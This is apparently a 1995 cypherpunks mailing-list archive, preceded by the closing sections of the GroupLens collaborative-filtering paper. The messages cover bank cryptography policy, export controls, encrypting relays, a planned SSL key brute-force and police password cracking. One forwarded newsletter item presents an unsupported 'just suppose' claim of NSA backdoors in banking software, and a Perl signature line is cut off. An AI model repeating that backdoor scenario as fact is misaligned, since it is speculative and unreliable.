read such articles, the incentive to post them will decrease. GroupLens may also supplant or supplement other established Netnews behaviors. Moderated Newsgroups GroupLens may reduce the need for moderated newsgroups. The advantages of GroupLens over the existing approach are that "moderators" can be groups of people as well as individuals, and that each user can rely on a different moderator rather than having a single moderator for the entire group. Some newsgroups might choose to use both a moderator and GroupLens. The moderator of a newsgroup will make the initial pass through the article submissions. Peer ratings would then allow further filtering. Newsgroup Splits Currently, newsgroups start off with broad topics and split into narrower topics as traffic increases. For example, the newsgroup rec.sport.football eventually split into the subgroups australian, canadian, rugby, pro, college, fantasy, misc, and one for each team in the NFL. These splits are a form of content filtering, initiated and managed by the users. GroupLens users may find that many such splits are less important, and in some cases undesirable. Over the course of time users will find themselves reading only the subset of the newsgroup they are most interested in, as they correlate with a peer group with similar interests. Splits of interest between groups of users will appear naturally, with no additional user or administrative effort. Allowing the splits to happen through GroupLens rather than through explicit content filtering allows more cross-pollination of general interest articles. For instance, interesting articles posted by Bills fans about an upcoming football game against the Cowboys would also reach Cowboys fans with GroupLens, but would not if the articles were posted in the more specialized newsgroup rec.sport.football.bills. Kill-Files Kill files are a content filtering mechanism implemented in some news clients. Many users who strongly dislike particular subjects or particular authors, however, do not use kill files because they find the mechanism complicated and cumbersome. GroupLens might be an easier means to the same end. A user's peer group will give such articles low ratings, so only a few users will have to read them. Incentives Individuals put additional effort, albeit a modest amount, into providing ratings through GroupLens. These ratings provide benefit to other users who can use them to select interesting articles. It's a two-way street: everyone can be both a producer and a consumer of ratings. When someone reads and rates an article, there is an incentive to provide honest ratings, because dishonest ratings will cause the BBB to make poor future predictions for that user. On the other hand, there is no incentive to rate articles at all. On the contrary, there is an incentive to wait for others' ratings rather than read and rate an article oneself. A certain amount of altruism or guilt may cause most people to "do their share" of rating, but fewer than the socially optimal number of ratings are likely to be produced. The four-person Minnesota pilot test included a high-volume newsgroup, rec.arts.movies. The volume of articles was so high that each participant was unwilling to read a one-quarter share of the total daily volume. The newsgroup was quickly dropped from the test. It may be that a larger user population would generate ratings even for a high-volume list such as rec.arts.movies, but it is harder to draw on a "do-your-share" mentality when collaborating with larger groups of people. There are other, more subtle incentive problems that can arise as well. For example, there is an asymmetry between the effects of positive and negative ratings. If the first few readers rate an article too highly, others will read the article and give it lower ratings. On the other hand, if the first few ratings of an article are negative, others who would have rated it highly may never look at it because of the initial negative rating. To avoid this, it may be necessary to provide external incentives to some people to read and rate articles that have initially low ratings. The external incentives could be money, fame, or simply access to others' ratings: those who did not contribute their share of ratings might be denied access to the Better Bit Bureau's predictions. Global Villages Present newsgroups, like newspapers and local television shows before them, provide a shared history for their community of readers. With GroupLens, users may choose to read articles only from a small group with whom they share many common interests. Over time this could lead to a fracture of the global village into many small tribes, each forming a virtual community but nonetheless isolated from each other. Some kind of fracture is inevitable and even desirable, because no user can keep up with the overwhelming volume of news produced each day. The question is whether the subgroups will be closed or permeable. One argument for prognosticating permeability is that many groups will form for a short time and then disband [3]. Another is that many users will participate in several subgroups, providing a mechanism for the best ideas to cross boundaries of interest groups. CONCLUSION Shared evaluations are useful in all sorts of activities. We ask friends, colleagues, and professional reviewers for their opinions about books, movies, journal articles, cars, schools, and neighborhoods. Clearly, some form of shared evaluations should also help in filtering electronic information streams such as netnews. It is not yet clear exactly what form those evaluations should take, how they should be collected and disseminated, and how they should be used in selecting articles to read. GroupLens is one promising approach. A single number gives a composite rating of an article on all dimensions relevant to a particular reader. We have modified three news reading clients to enable easy entry of such numeric ratings. We have also modified the way that the clients display subject lines to include predicted scores based on others' ratings. Naturally, there will be differences of opinion among readers about particular articles, due to varying interests or quality assessments. To accommodate differences of opinion, not all readers will place equal trust in particular evaluators. The algorithms we have implemented automatically determine how much weight to place on each evaluation, based on the degree of correlation between past opinions of the reader and evaluator. This has the beneficial side effects that readers need not know initially whose evaluations to trust and the evaluators' opinions can become trusted even if the evaluators choose to remain anonymous. The GroupLens architecture allows new users to connect and new rating servers to come on line, without global coordination. A new user need only use a modified news client and have a connection to a rating server. The user need not convince the administrator of her netnews server to modify the news server, run any additional software, or even to carry any additional newsgroups. A new rating server needs only to get access to a news server that carries the ratings newsgroups. Moreover, the architecture is open. Anyone who wishes to can modify a news client to allow entry of evaluations or to use predicted scores, so long as the client follows the protocol we have established for communicating with the rating server. Anyone who wishes to improve on the score predictions that our rating servers make can do so. There may be better ways to correlate past evaluations. There may also be ways to use the evaluations in conjunction with content filtering. For example, when correlating past evaluations, the scoring algorithm might consider evaluations only of past articles that are somehow similar to the current one. Our next pilot test should yield a data set that can be used for evaluating alternative prediction methods. Only further testing can reveal whether GroupLens gathers the right kind of evaluations and uses them in ways that people like. If the simple numeric evaluations turn out to be sufficient, the architecture will scale up to large numbers of rating servers and users. If not, then data from our tests will help develop and evaluate other mechanisms for sharing and using evaluations. Right now, people read news articles and react to them, but those reactions are wasted. GroupLens is a first step toward mining this hidden resource. ACKNOWLEDGMENTS Shumpei Kumon's keynote address at CSCW 92 [11] inspired our investigation of the practical application of reputations to social filtering. Thanks to Lorin Hitt and Carl Feynman for helpful discussions about how to predict scores based on past correlations. Peter Foltz and Sue Dumais generously provided a test rating set generated from one of their experiments on content filtering [5]. Thanks also to Chris Avery, Joe Adler, Yannis Bakos, Erik Brynjolfsson, David Goldberg, Bill MacGregor, Tom Malone, David Maltz, Vahid Mashayekhi, Lisa Spears, Doug Terry, Mark Uhrmacher, and Zbigniew Wieckowski. REFERENCES 1. Allen, R.B. User Models: Theory, Method, and Practice. International Journal of Man-Machine Studies, 32, (1990), pp. 511-543. 2. Belkin, N.J. and Croft, B.W. Information Filtering and Information Retrieval: Two Sides of the Same Coin? CACM, 35, 12 (1992), pp. 29-38. 3. Brothers, L., Hollan, J., Nielsen, J., Stornetta, S., Abney, S., Furnas, G. and Littman, M. Supporting Informal Communication via Ephemeral Interest Groups. In Proceedings of CSCW 92 (1992, New York: ACM), pp. 84-90. 4. Deerwester, S., Dumais, S.T., Furnas, G.W., Landauer, T.K. and Harshman, R. Indexing by Latent Semantic Analysis. Journal of the American Society for Information Science, 41, 6 (1990), pp. 391-407. 5. Foltz, P.W. and Dumais, S.T. Personalized Information Delivery: An Analysis of Information Filtering Methods. Communications of the ACM, 35, 12 (1992), pp. 51-60. 6. Goldberg, D., Nichols, D., Oki, B.M. and Terry, D. Using Collaborative Filtering to Weave an Information Tapestry. Communications of the ACM, 35, 12 (1992), pp. 61-70. 7. Hill, W.C., Hollan, J.D., Wroblewski, D. and McCandless, T. Edit Wear and Read Wear. In Proceedings of CHI 92 Conference on Human Factors in Computing Systems (1992, New York: ACM), pp. 3-9. 8. Kahn, R.E. and Cerf, V.G. The Digital Library Project, Volume 1: The Wold of Knowbots. An Open Architecture for a Digital Library System and a Plan for Its Development . CNRI, 1895 Preston White Drive, Suite 100, Reston, VA 22091 Tech Report (March, 1988). 9. Karlgren, J. Newsgroup Clustering Based on User Behavior-- A Recommendation Algebra . Swedish Institute of Computer Science #SICS-T--94/04-SE (March, 1994). 10. Kawell, L.J., Beckhardt, S., Halvorsen, T. and Ozzie, R. Replicated Document Management in a Group Communication System. In Proceedings of CSCW 88 (1988, New York: ACM). 11. Kumon, S. From Wealth to Wisdom: A Change in the Social Paradigm. In Proceedings of CSCW 92 (1992, New York: ACM), pp. 3. 12. Maes, P. and Kozierok, R. Learning Interface Agents. In Proceedings of AAAI 93 (1993, San Mateo, CA: American Association for Artifical Intelligence). 13. Malone, T.W., Grant, K.R., Turbak, F.A., Brobst, S.A. and Cohen, M.D. Intelligent Information Sharing Systems. Communications of the ACM, 30, 5 (1987), pp. 390-402. 14. Maltz, D.A. Distributing Information for Collaborative Filtering on Usenet Net News . MIT Department of EECS MS Thesis (May, 1994). 15. Pindyck, R.S. and Rubinfeld, D.L. Econometric Models and Economic Forecasts. MacGraw-Hill, New York, 1991. 16. Salton, G. and Buckley, C. Term-Weighting Approaches in Automatic Text Retrieval. Information Processing and Management, 24, 5 (1988), pp. 513-523. 17. Salton, G. and Buckley, C. Improving Retrieval Performance by Relevance Feedback. Journal of the American Society for Information Science, 41, 4 (1990), pp. 288-297. 18. Sheth, B. A Learning Approach to Personalized Information Filtering . MIT Department of EECS MS Thesis (February, 1994). 19. Stodolsky, D.S. Invitational Journals Based Upon Peer Consensus . Roskilde University Centre, Institute of Geography, Socioeconomic Analysis, and Computer Science. ISSN 0109-9779-29 #No. 29/ 1990 (, 1990). 20. Suchak, M.A. GoodNews: A Collaborative Filter for Network News . MIT Department of EECS MS Thesis (February, 1994). 21. Wiederhold, G. Mediators in the Architecture of Future Information Systems. IEEE Computer, March, (1992), pp. 38-49. From hal9001 at panix.com Wed Jul 26 20:30:28 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Wed, 26 Jul 95 20:30:28 PDT Subject: Banks and Crypto Message-ID: At 13:25 7/26/95, KDAGUIO at aba.com wrote: >See attached file: F:\OFFILES\KODMAIL.MSG > > > >Attachment converted: Macintosh HD:KODMAIL.MSG (????/----) (0002C85B) Is there ANY reason why you did not just paste the text of this file into your message? Also, if you are going to attach files in lieu of writing messages, it might be useful to mention what Wordprocessor was used to create the file so it can be read. In this case, what format is your file in? Thank you. From hal9001 at panix.com Wed Jul 26 20:31:23 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Wed, 26 Jul 95 20:31:23 PDT Subject: Three strikes you're out! for politicians... yeah we wish! Message-ID: At 10:27 7/26/95, Scott Brickner wrote: >In message <2751 at umlaw.demon.co.uk> Michael Froomkin writes: >>> Therefore, the only organization which can hold a >>> senator/representative liable for passing a bad law is the one which >>> passed the law. :( > >>and the voters > >Not in the sense of being able to punish him. The voters may only >withold their support in the next election. Not nearly enough to >deter morons like Exon. Who, unless I'm confusing him with someone-else, is not going to stand for reelection and thus can run amuck with no possible fall-out from the voters. From rmartin at alias.com Wed Jul 26 20:41:11 1995 From: rmartin at alias.com (Richard Martin) Date: Wed, 26 Jul 95 20:41:11 PDT Subject: Canadian Export Controls Message-ID: <9507262340.ZM6734@glacius.alias.com> This is a notification of the first creation of a few pages describing Canadian Export Controls. Any one who has read the printed document [Canada's Export Controls] will realise that it's almot word-for-word, but there's some use for that. In any case, they currently live at http://www.io.org/~samwise/crypto/ It may be that they'll move, but http://www.io.org/~samwise/interesting.html#privacy should always have a pointer to them. comments, bugs, spelling errors, contributions to rmartin at alias.com The pages were written this evening. Tomorrow morning I'll look at them, scream, wonder what I was thinking, and rewrite them. This is so that there'll be a few more screams. :) frodo =) From mp at io.org Wed Jul 26 20:52:36 1995 From: mp at io.org (M. Plumb) Date: Wed, 26 Jul 95 20:52:36 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <9507251659.AA16288@ozymandias.austin.ibm.com> Message-ID: <199507270352.XAA01331@twitch.io.org> > So? The ITAR doesn't control export to Canada. Export the source code > to Canada, compile, validate, sign, and put on CD in Canada, and export > to the world. No. Export of crypto to Canada is legal because Canada prohibits the further export of goods of U.S. origin. Before the Canadian government will allow further export of crypto software from the U.S., there must be lot of improvement done to the product within Canada. The exact rules are not well defined, but with crypto I expect that the CSE (Communications Security Establishment -- our version of the NSA) would push for at least 50% Canadian content. So I don't expect to see PGP being exported legally any time soon. > I also seem to remember a while back (Mar/Apr) someone reported here that the > Canadian bureaucrat responsible for executing import/export rules said > that he didn't consider crypto to be restricted by Canada's rules. I have talked with the bureaucrat that I think you are referring to, and he said no such thing. He said that public domain crypto software that is entirely of Canadian origin was, in his opinion not covered. When I talked to him, he stressed that PGP is still covered. -- -marc From gjeffers at socketis.net Wed Jul 26 21:20:37 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Wed, 26 Jul 95 21:20:37 PDT Subject: Strategic Invest. on Bad Boys, Blk Net, & Remailers Message-ID: <199507270622.BAA12647@mail.socketis.net> from: Strategic Investment 824 East Baltimore Street Baltimore, MD 21202 July 25, 1995 ------------------------------------------------------------ ---------- BEHIND THE LINES BY Jack Wheeler BAD GUYS Let's suppose, "just suppose," that the president has placed you in charge of a super-secret spy agency conducting electronic intelligence, the National Security Agency; and suppose that he ordered you to trace the activities of those who have replaced the Communists as official "Bad Guys," "Enemies of the State:" tax evaders, money launderers, and drug traffickers. So you decide to pull one of the great intelligence coups of modern times, by having the NSA become a major provider of banking software. Working through a cutout company skilled in managing money in support of U.S. covert operations, and using a modified version of sophisticated tracking software provided by the Justice Department's intelligence service (OSI, Office of Special Investigations), you sell your product to financial institutions around the globe - not telling them, of course, that what they're buying has an electronic "backdoor" giving the NSA computerized access to the intimate details of their customers' financial transactions. In less than a decade, your client list includes many of the world's leading banks. The banks behind the Visa smart card for the Atlanta Olympics, and those soon to offer Internet banking are your clients too. Yes, now you'll do your patriotic duty and get the Bad Guys - and anyone else you decide is an Enemy of the State. We're just suppposing, you understand. THE BLACK NET A worldwide communications system, accessible to anyone on the Inter- net, of completely anonymous and unbreakable encrypted messages and transactions: That's the vision of the Black Net being created by "crypto-anarchist" computer programmers. Using programs like "MixMaster" and anonymous re-mailer computer servers that nest encryted messages in encrypted envelopes, the Black Net will defeat the NSA's ability to trace communications to their source via traffic analysis or any other method. Black Net banks could offer totally untraceable and anonymous transact- tions with the identity of the account holder unknown even to the bank- - rendering any attempts, such as those imagined above, to get the Bad Guys useless. As economist Richard Rahn puts it: "The information tech- nology of the 80s (cheap faxes & photocopiers, satellite radio, etc.) doomed an government's attempt to have a monopoly on the supply of money." ------------------------------------------------------------ ----------- Beat State! From enzo at ima.com Wed Jul 26 22:17:48 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Wed, 26 Jul 95 22:17:48 PDT Subject: Netscape the Big Win In-Reply-To: <199507261447.AA17788@poboy.b17c.ingr.com> Message-ID: On Wed, 26 Jul 1995, Paul Robichaux wrote: > Hal said: > > This sounds very good if it already is almost working. The TCP > > connection which is opened would have to be to a server on the local > > machine, so it would be important that the software support that. Also, > > the local SOCKS relay would of course not want its winsock calls to be > > intercepted and translated in this way, so there would need to be some > > alternative way to access "vanilla" winsock. Can you give any > > more information on the NEC work? > > This should be fairly straightforward: take the existing winsock.dll > or winsock32.dll and rename it. Install the NEC DLL with the old > winsock's name, then have the NEC DLL do a LoadLibrary() to attach the > original version. In any case, Trumpet Winsock has got a buit-in socksifier, even in the non-time-limited version 2.0b. It's activated by the "Firewall setup" dialogue box, and seems to work: I've just tested it with a sockd 4.2b running on a Linux box. NEC's DLL will add the same functionality to other stacks, but experimental encrypting relays could be tested right now with Trumpet Winsock. Think about it, this could be the ultimate encryption hook: I don't think that NSA could arrive to ban firewall support... Now for a catchy name for SOCKS-based encrypting relays: what about "SafeSox"? :-) From johnl at radix.net Wed Jul 26 22:32:04 1995 From: johnl at radix.net (John A. Limpert) Date: Wed, 26 Jul 95 22:32:04 PDT Subject: Decoded Version of KODMAIL.MSG Message-ID: <199507270530.BAA08378@saltmine.radix.net> The American Bankers Association is attempting to address the privacy and security needs of banks and bank customers by ensuring that each have access to appropriate cryptographic tools. The ABA Cryptographic Policy will be posted on this list later today. ************************************************ CONTACT: Sonia Barbara FOR IMMEDIATE RELEASE (202) 663-5469 (1995) ABA REAFFIRMS SUPPORT FOR PRIVATE-SECTOR CONTROL OF CRYPTOGRAPHY Association Recommends a 10-year Extension for the Data Encryption Standard WASHINGTON, July 21 -- The Data Encryption Standard (DES) should be recertified for at least 10 more years to allow interested financial institutions adequate time to convert to any new cryptography standard, the American Bankers Association said in a policy statement issued today. Encryption is the process whereby sensitive data communications, such as wire transfers, credit card and automated teller machine transactions, are protected by secret codes to protect their confidentiality. DES, released in 1977, is the primary method used by financial institutions to encrypt information. Critics say that the longer DES is used, the more likely its code could be broken. While realizing this could limit its life span as a government certified standard, ABA warned that requiring banks to convert to a new standard by 1998 (the year DES's certification expires) could be prohibitively costly due to the high level of electronic funds transfers secured by DES. ABA therefore encouraged the National Institute for Standards and Technology (NIST) to continue to endorse DES as a Federal Information Processing Standard (FIPS) for use by the financial community. There has been an ongoing debate regarding who should control the development and support of private-sector computer security standards: the government or the private sector. ABA strongly recommends that the U.S. government work with the private sector and Congress in an open forum to develop a comprehensive policy on the commercial use of cryptography. In its newly-revised policy statement on cryptography, ABA proposed alternatives to DES and outlined other criteria that must be met before changes in cryptographic standards can be accepted by the banking industry. These criteria -- which will be (more) ABA CRYPTOGRAPHY POLICY/P2 presented next week to representatives of the White House, U.S. Department of Commerce, National Security Agency (NSA) and federal banking agencies -- were developed following a two-day meeting held in June of bankers, vendors and crypto experts concerned about the federal government's direction regarding private-sector information security. Specifically, ABA recommended: a The financial services industry be allowed to continue to use DES based on risk assessment (e.g. value of the transaction) and the business application involved. a A security framework encompassing a family of commercially available algorithms, including DES, be developed. This framework should include a process for negotiated algorithm selection based on the level of risk and other business requirements. a Opposition to government mandated key management systems for financial applications where keys would have to be stored outside the financial institution (e.g. key registration/surrender or the mandatory escrow of cryptographic keys). Instead, banks should continue to be responsible for key management and continue to cooperate with government for law enforcement purposes, as required by law. a Export of cryptography for financial applications must not be restricted. a Full participation of Congress and the private sector before establishing a U.S. policy for the commercial use of cryptography, instead of being carried out solely by Executive Order. [Note: These recommendations were summarized. For the full statement, please call Sonia Barbara at 202/663-5469.] The American Bankers Association is the only national trade and professional association serving the entire banking community, from small community banks to large bank holding companies. ABA members represent approximately 90 percent of the commercial banking industry's total assets, and about 94 percent of ABA members are community banks with assets less than $500 million. ### -- John A. Limpert johnl at Radix.Net From wolfgang at wi.WHU-Koblenz.de Thu Jul 27 00:55:23 1995 From: wolfgang at wi.WHU-Koblenz.de (Wolfgang Roeckelein) Date: Thu, 27 Jul 95 00:55:23 PDT Subject: RC4 Message-ID: <9507270754.AA04474@sirius.wi.WHU-Koblenz.de> Hi, >I wasn't aware that you could copyright an algorithm. Patent, yes, but not >copyright. Intellectual property meens secret, right? Aren't there any >precendence cases involving propriety schemes that are reverse engineered? Game cartridges (I think sega was involved) Wolfgang --- Dipl.-Wirtsch.-Inf. Voice: +49 261 6509 173 Wolfgang Roeckelein Fax: +49 261 6509 179 WHU Koblenz E-Mail: roeckelein at wi.whu-koblenz.de Burgplatz 2 (NeXTmail ok) D-56179 Vallendar WWW: http://www.whu-koblenz.de/~wolfgang/ Germany --rsa--------------------------------8<------------------------------------- #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 > From: "greg pitz" > Would someone be so kind as to describe the Utah initiative? I > wasn't able to find a further description in my percursory search of > Mr Froomkin's otherwise very informative home page > > http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html You can find the text at (save typing errors :-)): gopher://gopher.utah.edu:70/77/Off%20Campus%20Information/State%20of% 20Utah/Utah%20Legislative%20Bills/1995/Bills/Senate/SB0082 Bert-Jaap ---------------------------------------------------------------------- Bert-Jaap Koops tel +31 13 66 8101 Centre for Law and Informatization facs +31 13 66 8102 Tilburg University e-mail E.J.Koops at kub.nl -------------------------------------- Postbus 90153 | "We forgot the crackers!" | 5000 LE Tilburg | | The Netherlands | Wallace and Gromit | --------------------------------------------------------------------- http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm --------------------------------------------------------------------- From asb at nexor.co.uk Thu Jul 27 02:44:49 1995 From: asb at nexor.co.uk (Andy Brown) Date: Thu, 27 Jul 95 02:44:49 PDT Subject: Encrypting block driver for Linux...need some advice In-Reply-To: Message-ID: On Wed, 26 Jul 1995, Johnathan Corgan wrote: > Another, more crypto related question--how to deal with IV's? Right now, > I'm using 512 byte sectors with CBC. For each sector, the IV is the > sector number. This frustrates the known plaintext attack issue, but I'm > not sure if such a simple scheme is really effective. Probably not. Your scheme should be OK. If you'd chosen the same IV for each sector then identical sectors would encrypt the same. If I remember rightly then having a known IV only affects the security of the first block, after that the ciphertext chaining comes into effect. - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From anon-remailer at utopia.hacktic.nl Thu Jul 27 02:46:00 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Thu, 27 Jul 95 02:46:00 PDT Subject: Police computer forensics interview Message-ID: <199507270945.LAA08500@utopia.hacktic.nl> There is an article on page 122 of this weeks UK PC User (26 July - 22 August) by the head of the technical support unit for Essex Police. Here's a few choice cuts from the article: ... Now, what we do is go out on raids, or at least instruct officers on how to seize computers and bring them back to the computer evidence lab. The first thing we do with a computer is to make an exact copy of the hard disk and any floppies that come with it. It is essential that we have an exact image, rather than just a file copy, so we get everything, like the remaining bits of deleted files. We can interrogate the free space and slack space where there could be important evidence. To do this we've developed our own imaging system. This is basically a bit copier: it just copies every single bit of a hard disk onto either an optical drive or a hard drive, and saves it as a long file. We reconstruct the disk on our own computer, a Vale machine with a 90Mhz Pentium processor, and then we can perform the investigation. ... What we look for depends on the case: if it's a fraudster's machine, we'll be looking for sets of accounts, if we're dealing with a paedophile, we're looking at graphic images. We basically start by looking for erased material, which is always the most interesting, and the slack space. ... One of our biggest problems is getting around passwords and encryption. Not the base passwords -- they're easy to get around -- but the passwords on the applications themselves, and encryption can be very difficult to crack. We do have special programs to get around them, but you need individual ones for each application. The programs can crack most Microsoft applications in minutes, but some, Paradox for example, are a lot harder. The biggest headaches are the pocket organisers from Psion or Sharp. On a PC you have password protection, but you can always get in through the motherboard, but with a Psion you can't get in without the manufacturer's assistance. Interviewer: Ken Luxford Interviewee: Andrew Johnson From asb at nexor.co.uk Thu Jul 27 02:53:29 1995 From: asb at nexor.co.uk (Andy Brown) Date: Thu, 27 Jul 95 02:53:29 PDT Subject: SSL challenge? In-Reply-To: <9507262108.AA25550@toad.com> Message-ID: On Wed, 26 Jul 1995, Peter Trei wrote: > Where does the effort to bruteforce SSL stand? [an addition to Piete's follow-up] We should be ready to get going very soon. Clients and servers are working together and just need a little more testing to make sure they are better than perfect :-) The protocol we're going to use is designed to be highly general and can be used to attempt a brute force attack on any crypto algorithm. More on this later, but we've had a few thoughts... - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From rah at shipwright.com Thu Jul 27 05:03:21 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 27 Jul 95 05:03:21 PDT Subject: Banks and Crypto Message-ID: At 11:29 PM 7/26/95, Robert A. Rosenberg wrote: >At 13:25 7/26/95, KDAGUIO at aba.com wrote: >>See attached file: F:\OFFILES\KODMAIL.MSG >Is there ANY reason why you did not just paste the text of this file into >your message? Cluelessness? Carelessness? Some version of "-lessness", I'm sure... >Also, if you are going to attach files in lieu of writing >messages, it might be useful to mention what Wordprocessor was used to >create the file so it can be read. In this case, what format is your file >in? I just used a special feature on my Mac to deal with it. It's called a "trash can". Please remember that almost all such attachments, unless identified (even if identified, actually) usually get deleted. To paraphrase The Immortal: "ASCII R00lz!" Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From bigmac at digicash.com Thu Jul 27 06:09:35 1995 From: bigmac at digicash.com (Marcel van der Peijl) Date: Thu, 27 Jul 95 06:09:35 PDT Subject: Full text of David Chaum's Congressional speech Message-ID: <199507271307.PAA21979@digicash.com> Here's the full text of the speech David Chaum gave in his Congressional hearing. I will also make it available for online reading on our web server in the publications section. --- cut here --- Mr. Chairman, Members of the Committee: As an American who is regarded as the inventor of electronic cash, who has worked over the last dozen or so years to make the technology viable, and who is now CEO of a leading company pioneering in its commercialization, I am very pleased by the interest being shown here and to be here today. We are being forced to decide between two very different kinds of electronic payment technology. The core values we as a nation have fought for, and continue to stand for, are at stake. As a consequence of choosing one of the two directions, these values will be profoundly eroded; by choosing the other direction, however, they will be preserved and likely extended. Wise decisions at this critical juncture may also allow us to avoid certain other pitfalls and to realize economic leadership and growth. I think my limited time before you is best used to briefly explain the fundamentally different approaches to security, before coming to privacy, privacy technology, and its implications. Security Security is simply the protection of interests. People want to protect their own money and banks their own exposure. The role of government is to maintain the integrity of, and confidence in, the whole system. With electronic cash, just as with paper cash today, it will be the responsibility of government to protect against systemic risk. This is a serious role that cannot be left to the micro-economic interests of commercial organizations. In order for those in government to make informed decisions, it will be necessary for them to understand the basic ways to secure transactions in different situations. One basic form is tamper-resistance, exemplified by the chip in a chip card. It is designed to be hard to modify or to read secrets from. Such tamper-resistance is needed for "off-line" payments--those in which the reader device receiving payment from a card, validates payments by contacting a central system only at the end of each day. (Incidentally, this and the other basic form must rely for security on cryptography, sometimes refereed to as encryption, which is fundamental to all information security.) The other basic form is where the individual uses their own computer, whether a desk-top, lap-top, or palm-top device. Such "software only" is all that is needed in an "on-line" system--a system in which the party receiving payment communicates over a network during each payment. The trend is toward a convergence of these two forms into a hybrid--since people don't want incompatible forms of money and since it offers the best of both worlds in terms of convenience; in other words, you will put a chip card into a user-friendly electronic device of your own choosing, whether on your desk, in your living room, or in your pocket. I have brought some examples of this to show you... The problems I see in the industry today reflect a lack architecture. And architecture is essential when building infrastructure, which is what we are embarking on. In my view, a sound architecture must: (i) include the two basic forms of security, and allow for their integration into the hybrid; (ii) prevent the vulnerability of system-wide secrets from being stored in every card or, nearly as bad, every off-line point of payment; and (iii) address privacy concerns effectively, since they cannot be addressed as add-ons or afterthoughts. Today, DigiCash systems are alone in having any of these three attributes, and their architecture has all three. Privacy Let me now turn to this issue of privacy... A recent Harris poll of the American public began by introducing respondents to all the consumer benefits of the information superhighway. Then respondents were told that in order to make such systems economically viable, payment transaction data would have to be gathered and used for purposes such as making special offers to them. But the majority of respondents still objected to any use, other than consummation of the payment, and they gave privacy as the primary reason. Fully 82% of Americans today expressed concern over privacy of computerized data. That fraction has been growing steadily ever since the "first wave" of privacy concern was triggered when Americans saw their names punched into computer cards or printed on computer generated forms. When people are exposed to the information superhighway, which provides an awesome glimpse of the power of modern information technology, with dropping transaction costs leading to finer granularity of payments (which we will be hearing more about later), concern will reach new levels. Privacy Technology "Privacy technology" allows people to protect their own information, and other interests, while at the same time it maintains very high security for organizations. Essentially, it is the difference between, on the one hand, a centralized system with disenfranchised participants (like the electronically tagged animals in feedlots); and, on the other hand, a system where each participant is able to protect its own interests (like buyers and sellers on a town market square). Take ecash as an example of privacy technology. It provides a fully digital bearer instrument--a number that is itself money, just like a bank note is money. On the Internet, once someone downloads the requisite software, which takes only a few minutes, they are ready to send and receive ecash in payments. Security of ecash is superior to that of paper cash. If it is stolen, it cannot be used; if someone refuses to give you a receipt, you have proof that they deposited it; and if it is lost, you can get your money and records back. Counterfeiting ecash poses the same cryptographic challenge as breaking the most sophisticated codes used to protect nuclear materials, military secrets and large-value wire transfers. Therefore, ecash is certainly not the target of opportunity. Ecash is already being experimented with on the Internet in a worldwide monopoly money trial with tens of thousands of participants. Related card technology has been extensively tested, by DigiCash licensee Amtech, for highway-speed road tolls and road pricing, offering privacy instead of dossiers on everywhere people drive. And, CAFE, the European Commission sponsored trial, at its headquarters buildings in Brussels, of chip cards that can be inserted into electronic wallets (that I have already shown you), allows privacy in payments and the electronic ECU. Such "privacy technology" was even successfully used by the participants at the most recent international meeting of data protection commissioners. Ecash has received substantial media coverage; consequently, the public is beginning to realize that the coming of electronic payments need not mean an obliteration of privacy. And the superhighway will give consumers unprecedented mobility to choose it. Some concern about ecash, however, has been raised by various parties over possibilities it might open for illicit payments. But there is simply no legitimate basis for these allegations. Ecash, even when it achieves significant scale, is considerably less dangerous to society than automatic teller machines. For one thing, like cash, the amount withdrawn and deposited is on record; but, for another, unlike cash, the amounts of money that pass through each person's hands are also on record at the bank. Ecash itself is less prone to abuse than paper bank notes, because privacy is "one-way," which means that an extortionist, a seller on a black-market, or the acceptor of a bribe is forever vulnerable to being irrefutably incriminated by the party that paid them. National Leadership Governments who stifle the new technology while it is still in its infancy, before its has had a chance to develop and harmonize with our institutions; who don't pro-actively support needed infrastructure; or who fail to establish confidence by protecting against systemic risk--will be left behind in global competition. Countries who take clear positions based on understanding of the technology, however, and encourage needed developments, stand to gain enormous economic growth and market leadership. Privacy technology, whether used for electronic payments, voting, or other public expression, is the electronic equivalent of a free market and democracy. People will come to insist on it as an informational human right. Dr. David Chaum, DigiCash --- cut here --- // Marcel van der Peijl, DigiCash bv // http://www.digicash.com/~bigmac/ // There is no signature like no signature! From Michael at umlaw.demon.co.uk Thu Jul 27 06:12:32 1995 From: Michael at umlaw.demon.co.uk (Michael Froomkin) Date: Thu, 27 Jul 95 06:12:32 PDT Subject: NRC panel wants questions for Law Enforcement on crypto policy Message-ID: <2802@umlaw.demon.co.uk> ask them if their policy allows them to purport to run an anonymous remailer, e.g. as part of a sting operation. In message <9507261951.AA23210 at toad.com> John Gilmore writes: > I collated all the questions into a large ungainly message and sent it > to Herb Lin. He has been after me to go back over it and make a more > useful set of questions, which I haven't done yet. He says they are > meeting with the FBI in September and want to get questions to them in > August (incorporating our ideas). I've promised him I will get him the > formatted list of questions by the end of next week. > > John > -- Michael Froomkin until Aug 6: michael at umlaw.demon.co.uk U.Miami School of Law London, England mfroomki at umiami.ir.miami.edu <-- this will still find me PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html From schneier at winternet.com Thu Jul 27 06:30:03 1995 From: schneier at winternet.com (Bruce Schneier) Date: Thu, 